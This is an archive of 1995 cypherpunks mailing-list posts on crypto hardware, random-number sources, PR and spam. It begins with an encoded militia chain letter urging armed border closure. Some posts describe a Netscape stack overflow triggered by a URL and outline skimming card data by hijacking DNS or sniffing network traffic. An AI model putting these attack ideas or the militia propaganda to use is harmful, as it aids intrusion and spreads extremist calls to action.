M:&\@87)E(&)E='=E96X@=&AE(&%G97,@;V8@,3@-"B`@("`@("`@("`@("`@
M("`@("`@("!A;F0@-#4L(&%N9"!W:&\@87)E(')E<VED96YT<R!O9B!T:&4@
M4W1A=&4@86YD(&]F('-U8V@@;W1H97(@<&5R<V]N<PT*("`@("`@("`@("`@
M("`@("`@("`@(&%S(&UA>2!U<&]N('1H96ER(&]W;B!A<'!L:6-A=&EO;B!B
M92!E;FQI<W1E9"!O<B!C;VUM:7-S:6]N960@=&AE<F5I;@T*("`@("`@("`@
M("`@("`@("`@("`@('!U<G-U86YT('1O('1H92!P<F]V:7-I;VYS(&]F('1H
M:7,@9&EV:7-I;VXL('-U8FIE8W0L(&AO=V5V97(L('1O('-U8V@-"B`@("`@
M("`@("`@("`@("`@("`@("!E>&5M<'1I;VYS(&%S(&YO=R!E>&ES="!O<B!M
M87D@8F4@:&5R96%F=&5R(&-R96%T960@8GD@=&AE(&QA=W,@;V8@=&AE#0H@
M("`@("`@("`@("`@("`@("`@("`@56YI=&5D(%-T871E<R!O<B!O9B!T:&ES
M(%-T871E+B(-"@T*("`@("`@("`@("`@("`@("`@06YO=&AE<B!Q=65S=&EO
M;B!)(&%M('-U<F4@=VEL;"!C;VUE('5P(&ES('1H:7,-"@T*("`@("`@("`@
M("`@("`@("`@(E=H870@:7,@=&AE('-I9VYI9FEC86YC92!O9B!T:&4@9&%T
M92!&96(@,#$L(#$Y.38_(@T*#0H@("`@("`@("`@("`@("`@("!4:&5R92!I
M<R!.3R!S:6=N:69I8V%N8V4@9F]R('1H:7,@9&%T92X@(%1H:7,@9&%T92`@
M<F5F;&5C=',@(&YO=&AI;F<@(&UO<F4-"B`@("`@("`@("`@("`@("`@('1H
M86X@82!P;VEN="!I;B!T:6UE+"!I;B!T:&4@;F5A<B!F=71U<F4L('=H:6-H
M(&%L;&]W<R!C=7(@9F5D97)A;`T*("`@("`@("`@("`@("`@("`@9V]V97)N
M;65N="!A;F0@=&AE('-T871E($=O=F5R;F]R<R!T:6UE('1O(&%S<V5S<R!T
M:&5I<B!P;W-I=&EO;B!O;B!)3$Q%1T%,#0H@("`@("`@("`@("`@("`@("!)
M34U)1U)!5$E/3B!A;F0@24Q,14=!3"!44D%&1DE#2TE.1R!O9B!$4E5'4RP@
M86YD('1H96ER(&EN=&5N9&5D(&-O=7)S92!O9@T*("`@("`@("`@("`@("`@
M("`@86-T:6]N(&%N9"!T:&4@;&]G:7-T:6-S(')E<75I<F5D('1O(&%C:&EE
M=F4@=&AE(&1E9F5N<V4@;W5T;&EN960@86)O=F4N#0H-"B`@("`@("`@("`@
M("`@("`@(%1H:7,@=&EM92!P97)I;V0@:7,@<F]U9VAL>2!F:79E("!M;VYT
M:',N("!)9B`@8W5R("!G;W9E<FYM96YT)W,@('!O<VET:6]N#0H@("`@("`@
M("`@("`@("`@("!C86YN;W0@8F4@9F]R;75L871E9"!A;F0@=&AE:7(@9&5F
M96YS:79E(')E<W!O;G-E(&%C:&EE=F5D(&EN(&9I=F4@;6]N=&AS+`T*("`@
M("`@("`@("`@("`@("`@=&AE;B!I="!C86XG="!B92!D;VYE(&EN(&9I=F4@
M>65A<G,N#0H-"B`@("`@("`@("`@("`@("`@(%-O('=H97)E(&1O('=E('1H
M92!P96]P;&4@9')A=R!T:&4@;&EN93\@5V4@9')A=R!I="!A="!&96(N(#`Q
M+"`Q.3DV+@T*#0H@("`@("`@("`@("`@("`@("!792!A<F4@87-K:6YG('1H
M92!53D]21T%.25I%1"!-24Q)5$E!('1O(&)E(&%T($1%1D-/3B!L979E;"`R
M(&)Y('1H:7,@9&%T90T*("`@("`@("`@("`@("`@("`@*$9E8BX@,#$L(#$Y
M.38I+B`@1F]R('1H;W-E(&]F('EO=2!W:&\@9&\@;F]T('5N9&5R<W1A;F0@
M=VAA="!T:&ES(&UE86YS+"!)#0H@("`@("`@("`@("`@("`@("!W:6QL(&=I
M=F4@>6]U(&$@=F5R>2!S:6UP;&EF:65D(&5X<&QA;F%T:6]N<PT*#0H,("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("!&<F]M.B!$96%N($-O;7!T;VX@("`@("`@("`@("`@("`@("`@
M("`@("`@.2\R.2\Y-2`@,38Z,#DZ-#@@(%!A9V4@,2`Q(&]F(#$R#0I.051)
M3TY!3"!!3$Q)04Y#12!/1B!#2%))4U1)04X@34E,251)00T*#0H-"@T*#0H-
M"@T*#0H@("`@("`@("`@("`@("`@1&5F96YS92!#;VYD:71I;VX@3&5V96P@
M,B!M96%N<R`G<F5A9'D@9F]R(&1E<&QO>6UE;G0G+B`@270@;65A;G,@=&AA
M="!E86-H#0H@("`@("`@("`@("`@("`@:6YD:79I9'5A;"!M:6QI=&EA(&UE
M;6)E<B!W:6QL(&)E(&)O=&@@<&AY<VEC86QL>2!A;F0@<W!I<FET=6%L;'D@
M<')E<&%R960-"B`@("`@("`@("`@("`@("!T;R!U;F1E<G1A:V4@=&AE:7(@
M9'5T:65S(&%S(&UA>2!B92!R97%U:7)E9"!B>2!T:&4@0V]M;6%N9&5R(&EN
M($-H:65F(&]F#0H@("`@("`@("`@("`@("`@=&AE(%53+"!T:&4@1V]V97)N
M;W)S(&]F('1H92!S=&%T92!297!U8FQI8R!O9B!#86QI9F]R;FEA(&%N9"!A
M;&P@;W1H97(-"B`@("`@("`@("`@("`@("!S=&%T92!R97!U8FQI8W,L('1H
M92!#;W5N='D@4VAE<FEF<G,[(&]R('1H92!096]P;&4[('1O(&1E9F5N9"!T
M:&4-"B`@("`@("`@("`@("`@("!3;W9E<F5I9VX@0F]R9&5R(&]F('1H97-E
M(%5N:71E9"!3=&%T97,N#0H-"B`@("`@("`@("`@("`@("!!;'1H;W5G:"!T
M:&4@0V%L:69O<FYI82!-:6QI=&EA(&UA>2!B92!P<F5P87)E9"!T;R!A8W0@
M:6UM961I871E;'D@=&AI<PT*("`@("`@("`@("`@("`@('!E<FEO9"!O9B!T
M:6UE('=A<R!F;W5N9"`H:6X@861D:71I;VX@=&\@=&AE(&%B;W9E(')E87-O
M;BD@=&\@8F4@;F5C97-S87)Y#0H@("`@("`@("`@("`@("`@9F]R('1H92!O
M=&AE<B!S=&%T92!297!U8FQI8W,@86QO;F<@=&AE(&)O<F1E<B!T;R!P<F5P
M87)E('1H96ER(&UE;6)E<G,@87,-"B`@("`@("`@("`@("`@("!M87D@8F4@
M<F5Q=6ER960N#0H-"B`@("`@("`@("`@("`@("!);B!C;VYJ=6YC=&EO;B!W
M:71H('-H=71T:6YG('1H92!B;W)D97(@=&\@04Q,("))3$Q%1T%,($5.5%)9
M(BP@;W1H97(-"B`@("`@("`@("`@("`@("!M:6QI=&EA('5N:71S('=O<FMI
M;F<@=VET:"!T:&4@87!P<F]P<FEA=&4@;&%W(&5N9F]R8V5M96YT(&%G96YC
M:65S('=I;&P-"B`@("`@("`@("`@("`@("!I9&5N=&EF>2!A;F0@;6]N:71O
M<B!!3$P@86ER8W)A9G0@;&%N9&EN9R!F:65L9',@=VET:&EN(&%N(&%R8FET
M<F%R>2!R86YG90T*("`@("`@("`@("`@("`@(&]F('1H92!B;W)D97(N#0H-
M"B`@("`@("`@("`@("`@("!-;VYI=&]R:6YG(&]F('1H97-E(&9I96QD<R!W
M:6QL(&)E('-T<FEC=&QY(&QI;6ET960@=&\@;V)S97)V871I;VX@;V8-"B`@
M("`@("`@("`@("`@("!A8W1I=FET>2X@($%L;"!S=7-P96-T960@:6QL96=A
M;"!A8W1I=FET>2!W:6QL(&)E(')E<&]R=&5D(&1I<F5C=&QY('1O(&QA=PT*
M("`@("`@("`@("`@("`@(&5N9F]R8V5M96YT+"!A;F0@=&AE>2!W:6QL('1A
M:V4@=&AE(&QE9V%L(&%C=&EO;G,@<F5Q=6ER960N#0H-"B`@("`@("`@("`@
M("`@("!!<'!R96AE;G-I;VX@;V8@86YY('!E<G-O;B!O<B!I=&5M($E,3$5'
M04Q,62!#4D]34TE.1R!T:&4@8F]R9&5R)V]N(&QA;F0G#0H@("`@("`@("`@
M("`@("`@=VEL;"!B92!A8V-O;7!L:7-H960@8GD@=&AE(&UI;&ET:6$@=6YI
M=',@9&5P;&]Y960@86QO;F<@=&AE('!H>7-I8V%L#0H@("`@("`@("`@("`@
M("`@8F]R9&5R+B`@06YY(&]T:&5R(&%P<')E:&5N<VEO;B!W:6QL(&)E(&%C
M8V]M<&QI<VAE9"!B>2!A<'!R;W!R:6%T92!L87<-"B`@("`@("`@("`@("`@
M("!E;F9O<F-E;65N="!A9V5N=',N#0H-"B`@("`@("`@("`@("`@("!792!W
M86YT('EO=2!T;R!F=6QL>2!U;F1E<G-T86YD.B!W:&5N('=E(&%R92!D97!L
M;WEE9"P@=&AE<F4@=VEL;"!B90T*("`@("`@("`@("`@("`@(&YO=&AI;F<@
M86YD(&YO(&]N92!T:&%T(&-R;W-S97,@=&AA="!B;W)D97(@15A#15!4(&EN
M(&$@3$%71E5,($U!3DY%4DD-"B`@("`@("`@("`@("`@("!.;W1H:6YG(&QA
M<F=E<B!T:&%N(&$@9V]P:&5R('=I;&P@;6%K92!I=',@=V%Y('!A<W1I#0H-
M"B`@("`@("`@("`@("`@("!!;F]T:&5R('%U97-T:6]N('1H870@=VEL;"!B
M92!R86ES960@:7,@=&AI<PT*#0H@("`@("`@("`@("`@("`@(D%R96XG="!Y
M;W4@9V]I;F<@=&\@9V5T(&$@;&]T(&]F(&%P<&]S:71I;VX@=&\@=&AI<R!P
M;&%N(C\-"@T*("`@("`@("`@("`@("`@(%=E(&9E;'0@=&AA="!T;R!B92!I
M;G1E<F5S=&EN9R!Q=65S=&EO;BX@(%=E(&AA=F4@8F5E;B!I;B!C;VYT86-T
M('=I=&@-"B`@("`@("`@("`@("`@("!C:71I>F5N<R!A;&P@86-R;W-S('1H
M92!C;W5N=')Y("TM(%5N;W)G86YI>F5D($UI;&ET:6$@;&5A9&5R<RP@4V5N
M871O<G,-"B`@("`@("`@("`@("`@("!A;F0@0V]N9W)E<W-M96XL($QA=R!%
M;F9O<F-E;65N="!P97)S;VYN96PL(&%N9"!A;GD@;G5M8F5R(&]F(&]T:&5R
M('!E;W!L92X-"@T*("`@("`@("`@("`@("`@(%1H92!S:6YG;&4@9W)E871E
M<W0@;V)S=&%C;&4@=&\@=&AE('!L86X@=V4@:&%V92!E;F-O=6YT97)E9"!I
M<RXN+B!C=7(-"B`@("`@("`@("`@("`@("!E;7!L;WEE97,L(&-U<B!F961E
M<F%L(&=O=F5R;FUE;G0N#0H-"B`@("`@("`@("`@("`@("!);B!T:&4@8F5G
M:6YN:6YG('1H:7,@87!P96%R960@<F%T:&5R(&ER;VYI8RX@(%EO=2!W;W5L
M9"!H879E('1H;W5G:'0@=&AE#0H@("`@("`@("`@("`@("`@8FEG9V5S="!O
M8G-T86-L92!W;W5L9"!H879E(&)E96X@=&AE(&=U>7,@<G5N;FEN9R!T:&4@
M9')U9W,N#0H-"B`@("`@("`@("`@("`@("!"=70@87,@=&AI<R!P;&%N(&)E
M9V%N('1O(&)E(&QO;VME9"!I;G1O('=I=&@@;6]R92!T:&%N(&$@<&%S<VEN
M9R!F86YC>2P@:70-"B`@("`@("`@("`@("`@("!B96-A;64@8VQE87(@=&AA
M="!T:&5R92!A<F4@=&AO<V4@:6X@:&EG:"!P;W-I=&EO;G,@=VAO(&1O(&YO
M="!W86YT('1H:7,-"B`@("`@("`@("`@("`@("!P<F]B;&5M(')E<V]L=F5D
M(0T*#0H@("`@("`@("`@("`@("`@5V4@9F]U;F0@=&AA="!H87)D('1O(&)E
M;&EE=F4@+2T@:6YI=&EA;&QY+B`@0G5T+"!Y;W4@9F]L:W,@=VEL;"!H879E
M(&%N#0H@("`@("`@("`@("`@("`@;W!P;W)T=6YI='D@=&\@9FEN9"!T:&ES
M(&9A8W0@;W5T(&9O<B!Y;W5R<V5L=F5S+B`@66]U('=I;&P@:&%V92!T:&4@
M8VAA;F-E#0H@("`@("`@("`@("`@("`@=&\@<V5E('1H;W-E('!E;W!L92!C
M;VUE('1O('1H92!S=7)F86-E+@T*#0H@("`@("`@("`@("`@("`@5V4@:&%V
M92!A($-O;G-T:71U=&EO;B!H97)E+B`@5V4@:&%V92!L87=S('1H870@<')O
M=&5C="!C=7(@<FEG:'0@=&\@9&5F96YD#0H-"@P@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M1G)O;3H@1&5A;B!#;VUP=&]N("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@.2\R.2\Y-2`@,38Z,3`Z,C8@(%!A9V4@,3(@;V8@,3(-"DY!5$E/3D%,
M($%,3$E!3D-%($]&($-(4DE35$E!3B!-24Q)5$E!#0H-"@T*#0H-"@T*#0H-
M"B`@("`@("`@("`@("`@("`@(&]U<B!F86UI;&EE<RP@:&]M97,@86YD(&]U
M<B!C;W5N=')Y+@T*#0H@("`@("`@("`@("`@("`@("!"=70L(&%S('1H92!D
M96%D;&EN92!D<F%W<R!N96%R+"!Y;W4@=VEL;"!S964@8V5R=&%I;B!P96]P
M;&4@<W1I8VL@=&AE:7(-"B`@("`@("`@("`@("`@("`@(&AE861S('5P(&QO
M;F<@96YO=6=H(&9O<B!Y;W4@=&\@:61E;G1I9GD@=&AE;2X@(%1H97D@=VEL
M;"!O<'!O<V4@=&AI<R!P;&%N#0H@("`@("`@("`@("`@("`@("!W:71H(&$@
M9F5R=F]R(&)E>6]N9"!Y;W5R('=I;&1E<W0@9')E86US+@T*#0H@("`@("`@
M("`@("`@("`@("`H9&ER96-T('%U97-T:6]N<R!O9B!T:&4@<')E<W,@;F]T
M(')E<')I;G1E9"!H97)E*0T*("`@("`@("`@("`@("`@("`@("`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N+B`N
M+@T*("`@("`@("`@("`@("`@("`@0$%!04%!04%!04%!04%!04%!04%!04%!
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!00T*("`@
6("`@("`@("`@("`@("`@04%P#0H-"E-3
 
end
//END BINARY MAIL SEGMENT:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 30 Sep 95 10:05:25 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cypherpunks Press release
Message-ID: <199509301705.KAA24620@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:26 PM 9/30/95 +1000, Jiri Baum wrote:
>All that is needed then is someone with a fax machine to volunteer
>to receive the fax, type it in and summarise the response afterwards
>(noting points on which there was disagreement, and who disagreed
>in what way).

Let the dim bulbs subscribe to the list themselves.

If they are not capable of that, they will not make any
intelligent reports on it anyway.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 30 Sep 95 10:43:08 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <v02120d01ac933d63d4d3@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Simon--

There is a lot more to cryptography hardware than just making
stuff go fast. Any kind of co-processor array could handle the
job -- doesn't have to be DSPs. For unsigned integer math, the
486 DX4/100 is a perfectly decent chip, and prices are plummeting.
If all you want is to make RSA go fast, you can rack up as
many of these as you want, and do your work at Ethernet speeds
(which should be more than fast enough for the foreseeable future.)
Also, you get to use your old familiar (and inexpensive) programming
tools to write your code.

It also turns out that when you're actually using cryptography to do
valuable stuff, a lot of other concerns are just as
important as speed -- in particular, physical security over the
private keys. Most server-oriented cryptography add-ins are highly
tamper-resistant units that can only be re-keyed when some sort
of dongle is attached. Said dongle can be kept much more securely
than a whole computer. Although other threats still remain, this
substantially reduces the threat of key compromise. Incidentally,
good hardware of this sort uses ASICs that give substantially more
bang for the buck than the DSP solutions you're suggesting.

Certainly messing around with DSPs is fun -- I've done it and
enjoyed it -- but I don't think they will ever be significant as
cryptographic co-processors.

>That's another question. A DSP chip can also be used for crypto - yet
>sound cards and nexts aren't ITARed, and aren't really considered
>dual-use. A Modular exponentiator isn't a crypto device  (hey -
>it's a bignum accelerator for Mathematica). Now, if I had a pipelined
>WSI chip capable of delivering one result per cycle, I could think of
>some useful applications, but ...
>
>Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 30 Sep 95 12:01:28 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID: <199509301855.LAA20507@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Except PGP skill doesn't equal PR skill, not to mention that there
> might be a geographical, time-zone or language barrier.
> 
> Sometimes having a separate PR person is useful, even if it does
> tend to lead to the moronic statements salesdroids are infamous for.
> With care, this problem can be minimized.

	In which case the person in question can hire their own PR
person. If Community ConneXion had the resources, we would hire a PR
person, because I would rather spend my time writing code and
implementing anonymous systems than writing press releases and talking
to reporters.

> 
> Only problem is, does anyone know of any other way to get our
> ideas to be accepted by Joe Sixpack?

	I don't expect The Mythical Joe Sixpack to accept my views.

> What is the essential difference between a journalist writing an
> article and a volunteer writing a press release?

	The difference between "speaking for" and "speaking about"

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Sat, 30 Sep 95 10:46:10 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac9161a3050210040cbd@[205.199.118.202]>
Message-ID: <Pine.LNX.3.91.950930114853.1433A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

howdy cpunks,

regarding the use of radioactive material for generating random
numbers, lantern mantles are fairly radioactive.  i'd say they would
be able to emit sufficient particles for OTP use, especially if one
builds a device that just constructs the pads all the time (ie, it
just sits there making various pads of X min length and Y max length,
storing them on a hard drive, or RAM if you're that rich).  you just
request a pad from the machine when you need it and encrypt whatever
with it... 

- -pjf
 
patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG2E5E3Qo/lG0AH5AQHBngQAieD6OL+sVGbyqHAuTFlLL7i1gFOQ5TA3
dGOAACMqWZGfHYIKkSZxaNIm1NjvSqjFK/0w/tZCtZedJBtPtxnCXSGRgF8FW8RG
QfxR2V9fnpNRje/w7+uh/1JezN/KGv3kWJ7DR8yyEIKcJK/MyGhdCfHNLjgHRGv4
yuezjkFnD5w=
=R7+/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sat, 30 Sep 95 08:57:58 PDT
To: sameer@c2.org (sameer)
Subject: Re: Ray Cromwell: Another Netscape Bug (and possible security (fwd)
In-Reply-To: <199509290559.WAA24563@infinity.c2.org>
Message-ID: <199509301557.LAA03540@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Forwarded message:
> From owner-bugtraq@crimelab.com  Thu Sep 28 19:58:59 1995
> Approved-By: CHASIN@CRIMELAB.COM
> X-Mailer: ELM [version 2.4 PL23]
> Content-Type: text
> Approved-By:  Neil Woods <neil@LEGLESS.DEMON.CO.UK>
> Message-ID:  <199509280324.EAA19959@legless.demon.co.uk>
> Date:         Thu, 28 Sep 1995 04:24:06 +0100
> Reply-To: Bugtraq List <BUGTRAQ@crimelab.com>
> Sender: Bugtraq List <BUGTRAQ@crimelab.com>
> From: Neil Woods <neil@legless.demon.co.uk>
> Subject:      Re: Ray Cromwell: Another Netscape Bug (and possible security
> X-To:         BUGTRAQ@CRIMELAB.COM
> X-cc:         8lgm@bagpuss.demon.co.uk
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@crimelab.com>
> In-Reply-To:  <199509260045.OAA12377@hookomo.aloha.net> from "Timothy Newsham"
>               at Sep 25, 95 02:45:26 pm
> 
> >
> > > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> > > >fault and subsequent coredump. GDB reports nothing useable (stripped
> > > >executable)
> > >
> > >   I cannot reproduce this bug on the following platforms:
> > >
> > >         Solaris 2.5 beta/Netscape 1.1N
> >
> > I've reproduced it fine under sol2.4 1.1N.  The page
> > I tested from is http://www.aloha.net/~newsham/test.html.
> > Simply click on the long test url and core dump.
> > (You can view source before clicking to see what you
> > are clicking on if you don't trust me :)
> >
> > > Howard Owen hbo@octel.com   Octel Communications Corporation  1024/DC671C31 =
> >
> 
> I've tried this url, it does indeed core dump.
> 
> Just had a quick look at the core.  From first impressions, it's a global
> overwrite.  Therefore we're not overwriting a flushed stack frame, so a
> syslog(3) style exploit is impossible.
> 
> Global overwrites can be exploited, but due to the scenario we're looking
> at, I'd consider exploit chances to be very low indeed.

   It's not a global overwrite on my system. It is very definitely a stack
frame overwrite. I've already put code on my stack using a URL
so I know it's a stack problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sat, 30 Sep 95 09:00:15 PDT
To: Syed Yusuf <yusuf921@uidaho.edu>
Subject: Re: Electronic junk mail
In-Reply-To: <Pine.HPP.3.91.950929164534.29284A-100000@harrier.csrv.uidaho.edu>
Message-ID: <9509301557.AA23377@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Fri, 29 Sep 1995 16:54:43 -0700 (PDT)
    From: Syed Yusuf <yusuf921@uidaho.edu>

    I just received an electronic junkmail!

    . . .

    Cypher punks to the rescue? my privacy has been violated anyone got any
    ideas besides just putting each individual into my kill file?

Well, it's not a perfect solution and it might not have done anything
in this particular case, however the amount of electronic junk mail
has dropped close to zero since I added ``Please do not send
electronic junk mail!'' to my signature.

			Rick 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMG1o25NR+/jb2ZlNAQE5RwP/fPlJnpSCqV7YoA2vi8DAwW6m7bzNwmG7
ZH5mciCIvlrdL1Ua0ERVsiqmcXDE5lvU7aYigexBzedUX+q8E67St87gKEuXLkNa
tGNdOlDHb+JwUVfyUWXrHTHVkCgK//MIdToEypkLLv5stG0mHwwh2lf/SZgEPisk
YZJs/btH/TU=
=FO6+
-----END PGP SIGNATURE-----
--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 30 Sep 95 12:44:49 PDT
To: cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
Message-ID: <ac92ed4110021004ff54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:57 PM 9/30/95, zinc wrote:

>regarding the use of radioactive material for generating random
>numbers, lantern mantles are fairly radioactive.  i'd say they would
>be able to emit sufficient particles for OTP use, especially if one
>builds a device that just constructs the pads all the time (ie, it
>just sits there making various pads of X min length and Y max length,
>storing them on a hard drive, or RAM if you're that rich).  you just
>request a pad from the machine when you need it and encrypt whatever
>with it...

Thoriated lantern mantles are only slightly radioactive. The counts per
second is what matters. This will be a function of a lot of things, not the
least of which is the detector area and the fluence of alphas intercepted.

At the risk of repeating myself, there are easier ways of generating
essentially random numbers.

--Tim May

(P.S., as my last word on this for a while. You may have heard that RAM
chips can have bits flipped by the alpha particles emitted by low levels of
uranium and thorium present in packaging materials. And that cosmic rays
can do the same thing, at a lower error rate. Well, I discovered these
effects in 1977 and wrote the original papers on this "soft error" effect.
I'm not making an appeal to authority here, just telling you why I'm
skeptical of all of these proposals to make a radioactive decay-based
random number source. There are much easier ways.)


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 30 Sep 95 12:57:28 PDT
To: cypherpunks@toad.com
Subject: Re: Operation Stop The Aliens
Message-ID: <199509302004.NAA11763@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:11 AM 9/30/95 -0500, you wrote:
>-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] --
> Attachment: natltr.txt Code: 00H7GFL   \ Created: 09-29-95, 06:21 PM [34 Kb]
>
>The Attached File Is For Viewing It I In Text Format Please Forward To
>Everyone on the net work. and post to every board " Please.." 
>//BEGIN BINARY MAIL SEGMENT:

What the hell is going on here!  Why am I suddenly seeing spam from every
nazi wannabe on the net?  Some of this crap has been posted to the
Cypherpunks list.  What kind of weird reputation do we have in the outside
world?  I would venture to guess that we have more anti-authoritarians here
than authoritarians.  Are these people that clueless (or stupid) to post
that crap here?  So far, I have been getting neo-nazi spam, Christian Nazi
spam, Libertarian nazi chain letter spam, and (why do I expect vikings to
descend from the ceiling) a whole lot more.  The next thing I expect to see
here is "evil aliens are stealing my luggage" spam.

I expect this bozo will have his account removed pretty quick...

Maybe we need a few national stories about the horrible things that happen
to people who spam mailing lists and newsgroups. ("Suddenly a wrecking crew
showed up at their house and leveled it to the ground.")

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:09:27 PDT
To: www-security@ns2.rutgers.edu
Subject: A new tack on breaking SSL streams and NetScape servers
Message-ID: <9509301909.AA10965@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


| From jbass Mon Sep 25 15:00:41 1995
| To: JohnCGreen@aol.com
| Subject: Re:  Netscape bug, RSA patent, hacker challenge
| Cc: rmiug-discuss@rmiug.org, isig@netf.org
| 
| On Thu, 21 Sep 1995 JohnCGreen@aol.com wrote:
| > Internet commerce is getting off to a slow start. One of the reasons is
| > nervousness on the part of the general public regarding the use of insecure
| > networks. I believe it is not in the industry's interest to have vendors
| > publicly pointing out flaws in competitors' products.
| [ ... part deleted ...]
| > I believe that as long as industry experts working for huge companies like
| > Sun and AT&T as well as executives of small companies like NetManage and
| > Community ConneXion continue to criticize publicly the security of
| > competitors' systems commerce will be very slow to develop.
| > - - -
| > Internet Marketing and Business Development Consultant
| > 21483 Old Mine Rd             Tel: (408)353-1870
| > Los Gatos CA 95030           Internet: JohnCGreen@aol.com
| 
| Most of us are employed directly or indirectly by somebody. The quotes
| involved were not derived from text under a press release letterhead
| by the employers of those involved.  The press is certainly free to use
| the person's educational and employment credentials in citing the source.
| Your objections here are without merit, since the quotes were not
| officially released by the businesses involved and only serve to distract
| from the real problems.
| 
| Internet commerce is getting off to a slow start for good reason. Encryption
| or not, using the internet in its current state for commerce is fundamentally
| insecure, and the commercial internet providers have failed to address the
| primary problems. During a security discussion in the Colorado SuperNet
| users group mailing list last spring Brad Huntting, one of CSN's lead
| technical specialists, made this remarkably clear in his posting on
| 13 Mar 1995 23:55:46 in response to my posting regarding minimal security
| expectations to do business on/over the internet.
| 
| A clear line of attack for any site dealing with credit cards or other
| valuable data would be to attack the authoritative name servers (and routes
| to/thru DNS servers) to reroute the target host's traffic thru a filter host
| to skim off data transparently. Or more directly to watch /dev/nit somewhere
| on the network where www clients or servers are active with this data.
| 
| I am hardly an internet security expert, but also far from being a newbie
| at this game. I often have a more fundamental perspective on these problems,
| and in some cases very different levels of expectations. We are dealing with
| areas where there is no single right and wrong way to solve the security
| problem. But there are clearly certain technical flaws that MUST be addressed
| FIRST, before any solution will be viable.
| 
| [from my Mon, 13 Mar 95 21:43:46 -0700 posting to ug@csn.net]
| 
| I start with 4 expectations about providers which are seldom met:
| 
